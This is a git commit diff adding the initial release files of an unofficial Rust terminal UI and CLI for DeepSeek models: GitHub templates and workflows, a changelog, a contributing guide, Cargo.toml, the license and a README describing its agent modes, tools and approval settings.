Initial release v0.1.0
DeepSeek TUI - Unofficial terminal UI + CLI for DeepSeek models. Features: - Interactive TUI with multiple modes (Normal, Plan, Agent, YOLO, RLM, Duo) - Comprehensive tool access with approval gating - File operations, shell execution, task management - Sub-agent system for parallel work - MCP integration for external tool servers - Session management and skills system - Cross-platform support (macOS, Linux, Windows) 🤖 Generated with [Claude Code](https://claude.ai/code)
This commit is contained in:
@@ -0,0 +1,27 @@
|
||||
---
|
||||
name: Bug report
|
||||
about: Report a problem or regression
|
||||
labels: bug
|
||||
---
|
||||
|
||||
## Description
|
||||
|
||||
## Steps to reproduce
|
||||
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
|
||||
## Expected behavior
|
||||
|
||||
## Actual behavior
|
||||
|
||||
## Environment
|
||||
|
||||
- OS:
|
||||
- DeepSeek CLI version:
|
||||
- Model:
|
||||
- Shell:
|
||||
|
||||
## Logs or screenshots
|
||||
|
||||
@@ -0,0 +1 @@
|
||||
blank_issues_enabled: true
|
||||
@@ -0,0 +1,14 @@
|
||||
---
|
||||
name: Feature request
|
||||
about: Suggest an idea or improvement
|
||||
labels: enhancement
|
||||
---
|
||||
|
||||
## Problem
|
||||
|
||||
## Proposed solution
|
||||
|
||||
## Alternatives considered
|
||||
|
||||
## Additional context
|
||||
|
||||
@@ -0,0 +1,13 @@
|
||||
## Summary
|
||||
|
||||
## Testing
|
||||
|
||||
- [ ] `cargo test --all-features`
|
||||
- [ ] `cargo fmt --all -- --check`
|
||||
- [ ] `cargo clippy --all-targets --all-features`
|
||||
|
||||
## Checklist
|
||||
|
||||
- [ ] Updated docs or comments as needed
|
||||
- [ ] Added or updated tests where relevant
|
||||
- [ ] Verified TUI behavior manually if UI changes
|
||||
@@ -0,0 +1,65 @@
|
||||
name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [master, main]
|
||||
pull_request:
|
||||
branches: [master, main]
|
||||
|
||||
env:
|
||||
CARGO_TERM_COLOR: always
|
||||
RUSTFLAGS: -Dwarnings
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
name: Lint
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
with:
|
||||
components: clippy, rustfmt
|
||||
- uses: Swatinem/rust-cache@v2
|
||||
- name: Check formatting
|
||||
run: cargo fmt --all -- --check
|
||||
- name: Clippy
|
||||
run: cargo clippy --all-targets --all-features
|
||||
|
||||
test:
|
||||
name: Test
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
- uses: Swatinem/rust-cache@v2
|
||||
- name: Run tests
|
||||
run: cargo test --all-features
|
||||
|
||||
build:
|
||||
name: Build
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
- uses: Swatinem/rust-cache@v2
|
||||
- name: Build
|
||||
run: cargo build --release
|
||||
|
||||
# Check documentation builds without warnings
|
||||
docs:
|
||||
name: Documentation
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
- uses: Swatinem/rust-cache@v2
|
||||
- name: Build docs
|
||||
run: cargo doc --no-deps
|
||||
env:
|
||||
RUSTDOCFLAGS: -Dwarnings
|
||||
@@ -0,0 +1,30 @@
|
||||
name: Publish to Crates.io
|
||||
|
||||
on:
|
||||
release:
|
||||
types: [published]
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
publish:
|
||||
name: Publish to crates.io
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
- uses: Swatinem/rust-cache@v2
|
||||
|
||||
- name: Verify version matches tag
|
||||
if: github.event_name == 'release'
|
||||
run: |
|
||||
TAG_VERSION=${GITHUB_REF#refs/tags/v}
|
||||
CARGO_VERSION=$(cargo metadata --format-version 1 --no-deps | jq -r '.packages[0].version')
|
||||
if [ "$TAG_VERSION" != "$CARGO_VERSION" ]; then
|
||||
echo "Tag version ($TAG_VERSION) does not match Cargo.toml version ($CARGO_VERSION)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
- name: Publish to crates.io
|
||||
run: cargo publish
|
||||
env:
|
||||
CARGO_REGISTRY_TOKEN: ${{ secrets.CARGO_REGISTRY_TOKEN }}
|
||||
@@ -0,0 +1,29 @@
|
||||
name: publish
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
tags:
|
||||
- "v*"
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: read
|
||||
|
||||
jobs:
|
||||
pypi:
|
||||
runs-on: ubuntu-latest
|
||||
environment: pypi
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- name: Build package
|
||||
run: |
|
||||
python -m pip install --upgrade pip build
|
||||
python -m build
|
||||
- name: Publish to PyPI
|
||||
uses: pypa/gh-action-pypi-publish@release/v1
|
||||
with:
|
||||
skip-existing: true
|
||||
@@ -0,0 +1,57 @@
|
||||
name: Release
|
||||
|
||||
on:
|
||||
push:
|
||||
tags: ['v*']
|
||||
|
||||
jobs:
|
||||
build:
|
||||
strategy:
|
||||
matrix:
|
||||
include:
|
||||
- os: ubuntu-latest
|
||||
target: x86_64-unknown-linux-gnu
|
||||
binary: deepseek
|
||||
artifact_name: deepseek-linux-x64
|
||||
- os: macos-latest
|
||||
target: x86_64-apple-darwin
|
||||
binary: deepseek
|
||||
artifact_name: deepseek-macos-x64
|
||||
- os: macos-latest
|
||||
target: aarch64-apple-darwin
|
||||
binary: deepseek
|
||||
artifact_name: deepseek-macos-arm64
|
||||
- os: windows-latest
|
||||
target: x86_64-pc-windows-msvc
|
||||
binary: deepseek.exe
|
||||
artifact_name: deepseek-windows-x64.exe
|
||||
runs-on: ${{ matrix.os }}
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: dtolnay/rust-toolchain@stable
|
||||
with:
|
||||
targets: ${{ matrix.target }}
|
||||
- run: cargo build --release --target ${{ matrix.target }}
|
||||
- name: Rename binary
|
||||
shell: bash
|
||||
run: |
|
||||
cp target/${{ matrix.target }}/release/${{ matrix.binary }} ${{ matrix.artifact_name }}
|
||||
- uses: actions/upload-artifact@v4
|
||||
with:
|
||||
name: ${{ matrix.artifact_name }}
|
||||
path: ${{ matrix.artifact_name }}
|
||||
release:
|
||||
needs: build
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: write
|
||||
steps:
|
||||
- uses: actions/download-artifact@v4
|
||||
with:
|
||||
path: artifacts
|
||||
- name: List artifacts
|
||||
run: find artifacts -type f
|
||||
- uses: softprops/action-gh-release@v1
|
||||
with:
|
||||
files: artifacts/*/*
|
||||
prerelease: false
|
||||
+55
@@ -0,0 +1,55 @@
|
||||
# Build artifacts
|
||||
/target
|
||||
*.pdb
|
||||
*.exe
|
||||
*.dll
|
||||
*.so
|
||||
*.dylib
|
||||
*.rlib
|
||||
*.o
|
||||
|
||||
# Development
|
||||
.env
|
||||
.env.*
|
||||
.vscode/
|
||||
.idea/
|
||||
*.swp
|
||||
*.swo
|
||||
*~
|
||||
.DS_Store
|
||||
Thumbs.db
|
||||
|
||||
# Python
|
||||
__pycache__/
|
||||
*.py[cod]
|
||||
*$py.class
|
||||
.pytest_cache/
|
||||
venv/
|
||||
ENV/
|
||||
env/
|
||||
.venv/
|
||||
*.egg-info/
|
||||
dist/
|
||||
|
||||
# Logs
|
||||
*.log
|
||||
firebase-debug.log
|
||||
|
||||
# Generated
|
||||
outputs/
|
||||
|
||||
# Rust
|
||||
# Note: Cargo.lock is intentionally NOT ignored for reproducible builds
|
||||
firebase-debug.log
|
||||
tmp/
|
||||
|
||||
# Local dev scripts and temp files
|
||||
*.sh
|
||||
test.txt
|
||||
TODO*.md
|
||||
todo*.md
|
||||
CLAUDE.md
|
||||
NEXT_SESSION.md
|
||||
|
||||
.codex/
|
||||
docs/rlm-paper.txt
|
||||
@@ -0,0 +1,33 @@
|
||||
# Project Instructions
|
||||
|
||||
This file provides context for AI assistants working on this project.
|
||||
|
||||
## Project Type: Rust
|
||||
|
||||
### Commands
|
||||
- Build: `cargo build`
|
||||
- Test: `cargo test`
|
||||
- Run: `cargo run`
|
||||
- Check: `cargo check`
|
||||
- Format: `cargo fmt`
|
||||
- Lint: `cargo clippy`
|
||||
|
||||
### Project: deepseek-cli
|
||||
|
||||
### Documentation
|
||||
See README.md for project overview.
|
||||
|
||||
### Version Control
|
||||
This project uses Git. See .gitignore for excluded files.
|
||||
|
||||
|
||||
## Guidelines
|
||||
|
||||
- Follow existing code style and patterns
|
||||
- Write tests for new functionality
|
||||
- Keep changes focused and atomic
|
||||
- Document public APIs
|
||||
|
||||
## Important Notes
|
||||
|
||||
<!-- Add project-specific notes here -->
|
||||
@@ -0,0 +1,94 @@
|
||||
# Changelog
|
||||
|
||||
All notable changes to this project will be documented in this file.
|
||||
|
||||
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
|
||||
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
||||
|
||||
## [Unreleased]
|
||||
|
||||
## [0.0.1] - 2026-01-19
|
||||
|
||||
### Added
|
||||
- DeepSeek Responses API client with chat-completions fallback
|
||||
- CLI parity commands: login/logout, exec, review, apply, mcp, sandbox
|
||||
- Resume/fork session workflows with picker fallback
|
||||
- DeepSeek blue branding refresh + whale indicator
|
||||
- Responses API proxy subcommand for key-isolated forwarding
|
||||
- Execpolicy check tooling and feature flag CLI
|
||||
- Agentic exec mode (`deepseek exec --auto`) with auto-approvals
|
||||
|
||||
### Changed
|
||||
- Removed multimedia tooling and aligned prompts/docs for text-only DeepSeek API
|
||||
|
||||
## [0.1.9] - 2026-01-17
|
||||
|
||||
### Added
|
||||
- API connectivity test in `deepseek doctor` command
|
||||
- Helpful error diagnostics for common API failures (invalid key, timeout, network issues)
|
||||
|
||||
## [0.1.8] - 2026-01-16
|
||||
|
||||
### Added
|
||||
- Renderable widget abstraction and modal view stack for TUI composition
|
||||
- Parallel tool execution with lock-aware scheduling
|
||||
- Interactive shell mode with terminal pause/resume handling
|
||||
|
||||
### Changed
|
||||
- Tool approval requirements moved into tool specs
|
||||
- Tool results are recorded in original request order
|
||||
|
||||
## [0.1.7] - 2026-01-15
|
||||
|
||||
### Added
|
||||
- Duo mode (player-coach autocoding workflow)
|
||||
- Character-level transcript selection
|
||||
|
||||
### Fixed
|
||||
- Approval flow tool use ID routing
|
||||
- Cursor position sync for transcript selection
|
||||
|
||||
## [0.1.6] - 2026-01-14
|
||||
|
||||
### Added
|
||||
- Auto-RLM for large pasted blocks with context auto-load
|
||||
- `chunk_auto` and `rlm_query` `auto_chunks` for quick document sweeps
|
||||
- RLM usage badge with budget warnings in the footer
|
||||
|
||||
### Changed
|
||||
- Auto-RLM now honors explicit RLM file requests even for smaller files
|
||||
|
||||
## [0.1.5] - 2026-01-14
|
||||
|
||||
### Added
|
||||
- RLM prompt with external-context guidance and REPL tooling
|
||||
- RLM tools for context loading, execution, status, and sub-queries (rlm_load, rlm_exec, rlm_status, rlm_query)
|
||||
- RLM query usage tracking and variable buffers
|
||||
- Workspace-relative `@path` support for RLM loads
|
||||
- Auto-switch to RLM when users request large file analysis (or the largest file)
|
||||
|
||||
### Changed
|
||||
- Removed Edit mode; RLM chat is default with /repl toggle
|
||||
|
||||
## [0.1.0] - 2026-01-12
|
||||
|
||||
### Added
|
||||
- Initial alpha release of DeepSeek CLI
|
||||
- Interactive TUI chat interface
|
||||
- DeepSeek API integration (OpenAI-compatible Responses API)
|
||||
- Tool execution (shell, file ops)
|
||||
- MCP (Model Context Protocol) support
|
||||
- Session management with history
|
||||
- Skills/plugin system
|
||||
- Cost tracking and estimation
|
||||
- Hooks system and config profiles
|
||||
- Example skills and launch assets
|
||||
|
||||
[Unreleased]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.0.1...HEAD
|
||||
[0.0.1]: https://github.com/Hmbown/DeepSeek-CLI/releases/tag/v0.0.1
|
||||
[0.1.9]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.1.8...v0.1.9
|
||||
[0.1.8]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.1.7...v0.1.8
|
||||
[0.1.7]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.1.6...v0.1.7
|
||||
[0.1.6]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.1.5...v0.1.6
|
||||
[0.1.5]: https://github.com/Hmbown/DeepSeek-CLI/compare/v0.1.0...v0.1.5
|
||||
[0.1.0]: https://github.com/Hmbown/DeepSeek-CLI/releases/tag/v0.1.0
|
||||
+139
@@ -0,0 +1,139 @@
|
||||
# Contributing to DeepSeek CLI
|
||||
|
||||
Thank you for your interest in contributing to DeepSeek CLI! This document provides guidelines and instructions for contributing.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- Rust 1.85 or later (edition 2024)
|
||||
- Cargo package manager
|
||||
- Git
|
||||
|
||||
### Setting Up Development Environment
|
||||
|
||||
1. Fork and clone the repository:
|
||||
```bash
|
||||
git clone https://github.com/YOUR_USERNAME/DeepSeek-CLI.git
|
||||
cd DeepSeek-CLI
|
||||
```
|
||||
|
||||
2. Build the project:
|
||||
```bash
|
||||
cargo build
|
||||
```
|
||||
|
||||
3. Run tests:
|
||||
```bash
|
||||
cargo test
|
||||
```
|
||||
|
||||
4. Run with development settings:
|
||||
```bash
|
||||
cargo run
|
||||
```
|
||||
|
||||
## Development Workflow
|
||||
|
||||
### Code Style
|
||||
|
||||
- Run `cargo fmt` before committing to ensure consistent formatting
|
||||
- Run `cargo clippy` and address all warnings
|
||||
- Follow Rust naming conventions (snake_case for functions/variables, CamelCase for types)
|
||||
- Add documentation comments for public APIs
|
||||
|
||||
### Testing
|
||||
|
||||
- Write tests for new functionality
|
||||
- Ensure all existing tests pass: `cargo test`
|
||||
- For integration tests, use the `tests/` directory
|
||||
|
||||
### Commit Messages
|
||||
|
||||
Use clear, descriptive commit messages following conventional commits:
|
||||
|
||||
- `feat:` New feature
|
||||
- `fix:` Bug fix
|
||||
- `docs:` Documentation changes
|
||||
- `refactor:` Code refactoring
|
||||
- `test:` Adding or updating tests
|
||||
- `chore:` Maintenance tasks
|
||||
|
||||
Example: `feat: add --doctor command for system diagnostics`
|
||||
|
||||
## Project Structure
|
||||
|
||||
```
|
||||
src/
|
||||
├── main.rs # Entry point and CLI definition
|
||||
├── config.rs # Configuration management
|
||||
├── client.rs # HTTP client for DeepSeek API
|
||||
├── llm_client.rs # LLM abstraction layer
|
||||
├── models.rs # Data structures
|
||||
├── mcp.rs # Model Context Protocol support
|
||||
├── hooks.rs # Hook system for extensibility
|
||||
├── skills.rs # Skills/plugin system
|
||||
├── core/ # Core engine components
|
||||
│ ├── engine.rs # Main agent loop
|
||||
│ ├── session.rs # Session management
|
||||
│ └── ...
|
||||
├── tools/ # Built-in tools
|
||||
│ ├── shell.rs # Shell execution
|
||||
│ ├── file.rs # File operations
|
||||
│ └── ...
|
||||
├── tui/ # Terminal UI
|
||||
│ ├── app.rs # Application state
|
||||
│ ├── ui.rs # Rendering logic
|
||||
│ └── ...
|
||||
└── sandbox/ # Sandbox execution (macOS)
|
||||
```
|
||||
|
||||
## Submitting Changes
|
||||
|
||||
1. Create a feature branch from `main`:
|
||||
```bash
|
||||
git checkout -b feat/your-feature
|
||||
```
|
||||
|
||||
2. Make your changes and commit them
|
||||
|
||||
3. Ensure CI passes:
|
||||
```bash
|
||||
cargo fmt --check
|
||||
cargo clippy
|
||||
cargo test
|
||||
```
|
||||
|
||||
4. Push your branch and create a Pull Request
|
||||
|
||||
5. Describe your changes clearly in the PR description
|
||||
|
||||
## Pull Request Guidelines
|
||||
|
||||
- Keep PRs focused on a single change
|
||||
- Update documentation if needed
|
||||
- Add tests for new functionality
|
||||
- Ensure CI passes before requesting review
|
||||
|
||||
## Reporting Issues
|
||||
|
||||
When reporting issues, please include:
|
||||
|
||||
- Operating system and version
|
||||
- Rust version (`rustc --version`)
|
||||
- DeepSeek CLI version (`deepseek --version`)
|
||||
- Steps to reproduce the issue
|
||||
- Expected vs actual behavior
|
||||
- Relevant error messages or logs
|
||||
|
||||
## Code of Conduct
|
||||
|
||||
Be respectful and inclusive. We welcome contributors of all backgrounds and experience levels.
|
||||
|
||||
## License
|
||||
|
||||
By contributing to DeepSeek CLI, you agree that your contributions will be licensed under the MIT License.
|
||||
|
||||
## Questions?
|
||||
|
||||
Feel free to open an issue for any questions about contributing.
|
||||
Generated
+3845
File diff suppressed because it is too large
Load Diff
+64
@@ -0,0 +1,64 @@
|
||||
[package]
|
||||
name = "deepseek-tui"
|
||||
version = "0.1.0"
|
||||
edition = "2024"
|
||||
description = "Unofficial DeepSeek CLI - Just run 'deepseek' to start chatting"
|
||||
license = "MIT"
|
||||
repository = "https://github.com/Hmbown/DeepSeek-TUI"
|
||||
keywords = ["deepseek", "cli", "ai", "agent", "llm"]
|
||||
categories = ["command-line-utilities"]
|
||||
|
||||
[[bin]]
|
||||
name = "deepseek"
|
||||
path = "src/main.rs"
|
||||
|
||||
[dependencies]
|
||||
anyhow = "1.0.100"
|
||||
arboard = "3.4"
|
||||
async-stream = "0.3.6"
|
||||
async-trait = "0.1"
|
||||
bytes = "1.11.0"
|
||||
base64 = "0.22.1"
|
||||
clap = { version = "4.5.54", features = ["derive"] }
|
||||
clap_complete = "4.5"
|
||||
colored = "3.0.0"
|
||||
crossterm = "0.28"
|
||||
dotenvy = "0.15.7"
|
||||
dirs = "6.0.0"
|
||||
futures-util = "0.3.31"
|
||||
indicatif = "0.18.0"
|
||||
ratatui = "0.29"
|
||||
regex = "1.11"
|
||||
reqwest = { version = "0.13.1", default-features = false, features = ["blocking", "json", "stream", "multipart", "native-tls", "http2"] }
|
||||
rustyline = "15.0.0"
|
||||
serde = { version = "1.0.228", features = ["derive"] }
|
||||
serde_json = "1.0.149"
|
||||
shellexpand = "3"
|
||||
toml = "0.9.7"
|
||||
tokio = { version = "1.49.0", features = ["full"] }
|
||||
tokio-util = { version = "0.7.16", features = ["io"] }
|
||||
unicode-width = "0.2"
|
||||
unicode-segmentation = "1.12"
|
||||
uuid = { version = "1.11", features = ["v4"] }
|
||||
tokio-stream = "0.1"
|
||||
chrono = { version = "0.4", features = ["serde"] }
|
||||
tempfile = "3.16"
|
||||
thiserror = "2.0"
|
||||
tracing = "0.1"
|
||||
wait-timeout = "0.2"
|
||||
multimap = "0.10.0"
|
||||
shlex = "1.3.0"
|
||||
starlark = "0.13.0"
|
||||
tiny_http = "0.12"
|
||||
zeroize = "1.8.2"
|
||||
|
||||
[dev-dependencies]
|
||||
wiremock = "0.6"
|
||||
pretty_assertions = "1.4"
|
||||
|
||||
# Platform-specific dependencies
|
||||
[target.'cfg(target_os = "macos")'.dependencies]
|
||||
libc = "0.2"
|
||||
|
||||
[target.'cfg(target_os = "linux")'.dependencies]
|
||||
libc = "0.2"
|
||||
@@ -0,0 +1,21 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2024-2025 DeepSeek CLI Contributors
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
@@ -0,0 +1,291 @@
|
||||
# DeepSeek CLI 🤖
|
||||
|
||||
Your AI-powered terminal companion for DeepSeek models
|
||||
|
||||
[](https://github.com/Hmbown/DeepSeek-TUI/actions/workflows/ci.yml)
|
||||
[](https://crates.io/crates/deepseek-tui)
|
||||
[](https://www.npmjs.com/package/@hmbown/deepseek-tui)
|
||||
|
||||
Unofficial terminal UI (TUI) + CLI for the [DeepSeek platform](https://platform.deepseek.com) — chat with DeepSeek models and collaborate with AI assistants that can read, write, execute, and plan with approval-gated tool access.
|
||||
|
||||
**Not affiliated with DeepSeek Inc.**
|
||||
|
||||
## ✨ Features
|
||||
|
||||
- **Interactive TUI** with multiple modes (Normal, Plan, Agent, YOLO, RLM, Duo)
|
||||
- **Comprehensive tool access** – File operations, shell execution, task management, and sub-agent systems
|
||||
- **File operations**: List directories, read/write/edit files, apply patches, search files with regex
|
||||
- **Shell execution**: Run commands with timeout support, background execution with task management
|
||||
- **Task management**: Todo lists, implementation plans, persistent notes
|
||||
- **Sub-agent system**: Spawn, manage, and cancel background agents for parallel work
|
||||
- **Web search**: Integrated web search with DuckDuckGo
|
||||
- **Multi‑model support** – DeepSeek‑Reasoner, DeepSeek‑Chat, and other DeepSeek models
|
||||
- **Context‑aware** – loads project‑specific instructions from `AGENTS.md`
|
||||
- **Session management** – resume, fork, and search past conversations
|
||||
- **Skills system** – reusable workflows stored as `SKILL.md` directories
|
||||
- **Model Context Protocol (MCP)** – integrate external tool servers
|
||||
- **Sandboxed execution** (macOS) for safe shell commands
|
||||
- **Git integration** – code review, patch application, diff analysis
|
||||
- **Cross‑platform** – works on macOS, Linux, and Windows
|
||||
|
||||
## 🚀 Quick Start
|
||||
|
||||
1. **Get an API key** from [https://platform.deepseek.com](https://platform.deepseek.com)
|
||||
2. **Install and run**:
|
||||
|
||||
```bash
|
||||
# Install via npm (recommended)
|
||||
npm install -g @hmbown/deepseek-tui
|
||||
|
||||
# Or install via Cargo
|
||||
cargo install deepseek-tui --locked
|
||||
|
||||
# Set your API key
|
||||
export DEEPSEEK_API_KEY="YOUR_DEEPSEEK_API_KEY"
|
||||
|
||||
# Start chatting
|
||||
deepseek
|
||||
```
|
||||
|
||||
3. Press `F1` or type `/help` for the in‑app command list.
|
||||
|
||||
If anything looks off, run `deepseek doctor` to diagnose configuration issues.
|
||||
|
||||
## 📦 Installation
|
||||
|
||||
### Prebuilt via npm / bun (recommended)
|
||||
|
||||
The npm package is a thin wrapper that downloads the platform‑appropriate Rust binary from GitHub Releases.
|
||||
|
||||
```bash
|
||||
npm install -g @hmbown/deepseek-tui
|
||||
# or
|
||||
bun install -g @hmbown/deepseek-tui
|
||||
```
|
||||
|
||||
### From crates.io (Rust)
|
||||
|
||||
```bash
|
||||
cargo install deepseek-tui --locked
|
||||
```
|
||||
|
||||
### Build from source
|
||||
|
||||
```bash
|
||||
git clone https://github.com/Hmbown/DeepSeek-TUI.git
|
||||
cd DeepSeek-TUI
|
||||
cargo build --release
|
||||
./target/release/deepseek --help
|
||||
```
|
||||
|
||||
### Direct download
|
||||
|
||||
Download a prebuilt binary from [GitHub Releases](https://github.com/Hmbown/DeepSeek-TUI/releases) and put it on your `PATH` as `deepseek`.
|
||||
|
||||
## ⚙️ Configuration
|
||||
|
||||
On first run, the TUI can prompt for your API key and save it to `~/.deepseek/config.toml`. You can also create the file manually:
|
||||
|
||||
```toml
|
||||
# ~/.deepseek/config.toml
|
||||
api_key = "YOUR_DEEPSEEK_API_KEY" # must be non‑empty
|
||||
default_text_model = "deepseek-reasoner" # optional
|
||||
allow_shell = false # optional
|
||||
max_subagents = 3 # optional (1‑5)
|
||||
```
|
||||
|
||||
Useful environment variables:
|
||||
|
||||
- `DEEPSEEK_API_KEY` (overrides `api_key`)
|
||||
- `DEEPSEEK_BASE_URL` (default: `https://api.deepseek.com`; China users may use `https://api.deepseeki.com`)
|
||||
- `DEEPSEEK_PROFILE` (selects `[profiles.<name>]` from the config; errors if missing)
|
||||
- `DEEPSEEK_CONFIG_PATH` (override config path)
|
||||
- `DEEPSEEK_MCP_CONFIG`, `DEEPSEEK_SKILLS_DIR`, `DEEPSEEK_NOTES_PATH`, `DEEPSEEK_MEMORY_PATH`, `DEEPSEEK_ALLOW_SHELL`, `DEEPSEEK_MAX_SUBAGENTS`
|
||||
|
||||
See `config.example.toml` and `docs/CONFIGURATION.md` for a full reference.
|
||||
|
||||
## 🎮 Modes
|
||||
|
||||
In the TUI, press `Tab` to cycle modes: **Normal → Plan → Agent → YOLO → RLM → Duo → Normal**.
|
||||
|
||||
| Mode | Description | Approval Behavior |
|
||||
|------|-------------|-------------------|
|
||||
| **Normal** | Chat; asks before file writes or shell | Manual approval for writes & shell |
|
||||
| **Plan** | Design‑first prompting; same approvals as Normal | Manual approval for writes & shell |
|
||||
| **Agent** | Multi‑step tool use; asks before shell | Manual approval for shell, auto‑approve file writes |
|
||||
| **YOLO** | Enables shell + trust + auto‑approves all tools (dangerous) | Auto‑approve all tools |
|
||||
| **RLM** | Externalized context + REPL helpers; auto‑approves tools (best for large files) | Auto‑approve tools |
|
||||
| **Duo** | Player‑coach autocoding with iterative validation (based on g3 paper) | Depends on phase |
|
||||
|
||||
Approval behavior is mode‑dependent, but you can also override it at runtime with `/set approval_mode auto|suggest|never`.
|
||||
|
||||
## 🛠️ Tools
|
||||
|
||||
DeepSeek CLI exposes a comprehensive set of tools to the model across 5 categories, with 16+ individual tools available, all with approval gating based on the current mode.
|
||||
|
||||
### Tool Categories
|
||||
|
||||
#### File Operations
|
||||
- **`list_dir`** – List directory contents with file/directory metadata
|
||||
- **`read_file`** – Read UTF‑8 files from the workspace
|
||||
- **`write_file`** – Create or overwrite files
|
||||
- **`edit_file`** – Search and replace text in files
|
||||
- **`apply_patch`** – Apply unified diff patches with fuzzy matching
|
||||
- **`grep_files`** – Search files by regex pattern with context lines
|
||||
- **`web_search`** – Search the web and return concise results
|
||||
|
||||
#### Shell Execution
|
||||
- **`exec_shell`** – Run shell commands with timeout support
|
||||
- **Background execution** – Run commands in background with task ID return
|
||||
|
||||
#### Task Management
|
||||
- **`todo_write`** – Create and update todo lists with status tracking
|
||||
- **`update_plan`** – Manage structured implementation plans
|
||||
- **`note`** – Append persistent notes across sessions
|
||||
|
||||
#### Sub‑Agents
|
||||
- **`agent_spawn`** – Create background sub‑agents for focused tasks
|
||||
- **`agent_result`** – Retrieve results from sub‑agents
|
||||
- **`agent_list`** – List all active and completed agents
|
||||
- **`agent_cancel`** – Cancel running sub‑agents
|
||||
|
||||
### System Behavior
|
||||
|
||||
- **Workspace boundary**: File tools are restricted to `--workspace` unless you enable `/trust` (YOLO enables trust automatically).
|
||||
- **Approvals**: The TUI requests approval depending on mode and tool category (file writes, shell).
|
||||
- **Web search**: `web_search` uses DuckDuckGo HTML results and is auto‑approved.
|
||||
- **Skills**: Reusable workflows stored as `SKILL.md` directories (default: `~/.deepseek/skills`). Use `/skills` and `/skill <name>`.
|
||||
- **MCP**: Load external tool servers via `~/.deepseek/mcp.json` (supports `servers` and `mcpServers`). MCP tools currently execute without TUI approval prompts, so only enable servers you trust. See `docs/MCP.md`.
|
||||
|
||||
## 🧠 RLM (Reasoning & Large‑scale Memory)
|
||||
|
||||
RLM mode is designed for "too big for context" tasks: large files, whole‑doc sweeps, and big pasted blocks.
|
||||
|
||||
- Auto‑switch triggers: "largest file", explicit "RLM", large file requests, and large pastes.
|
||||
- Shortcut: `/rlm` (or `/aleph`) enters RLM mode directly.
|
||||
- In **RLM mode**, `/load @path` loads a file into the external context store (outside RLM mode, `/load` loads a saved chat JSON).
|
||||
- Use `/repl` to enter expression mode (e.g. `search("pattern")`, `lines(1, 80)`).
|
||||
- Power tools: `rlm_load`, `rlm_exec`, `rlm_status`, `rlm_query`.
|
||||
|
||||
`rlm_query` can be expensive: prefer batching and check `/status` if you're doing lots of sub‑queries.
|
||||
|
||||
## 👥 Duo Mode
|
||||
|
||||
Duo mode implements the player‑coach autocoding paradigm for iterative development with built‑in validation:
|
||||
|
||||
- **Player**: implements requirements (builder role)
|
||||
- **Coach**: validates implementation against requirements (critic role)
|
||||
- Tools: `duo_init`, `duo_player`, `duo_coach`, `duo_advance`, `duo_status`
|
||||
|
||||
Workflow: `init → player → coach → advance → (repeat until approved)`
|
||||
|
||||
## 📚 Examples
|
||||
|
||||
### Interactive chat
|
||||
|
||||
```bash
|
||||
deepseek
|
||||
```
|
||||
|
||||
### One‑shot prompt (non‑interactive)
|
||||
|
||||
```bash
|
||||
deepseek -p "Write a haiku about Rust"
|
||||
```
|
||||
|
||||
### Agentic execution with tool access
|
||||
|
||||
```bash
|
||||
deepseek exec --auto "Fix lint errors in the current directory"
|
||||
```
|
||||
|
||||
### Resume latest session
|
||||
|
||||
```bash
|
||||
deepseek --continue
|
||||
```
|
||||
|
||||
### Work on a specific project
|
||||
|
||||
```bash
|
||||
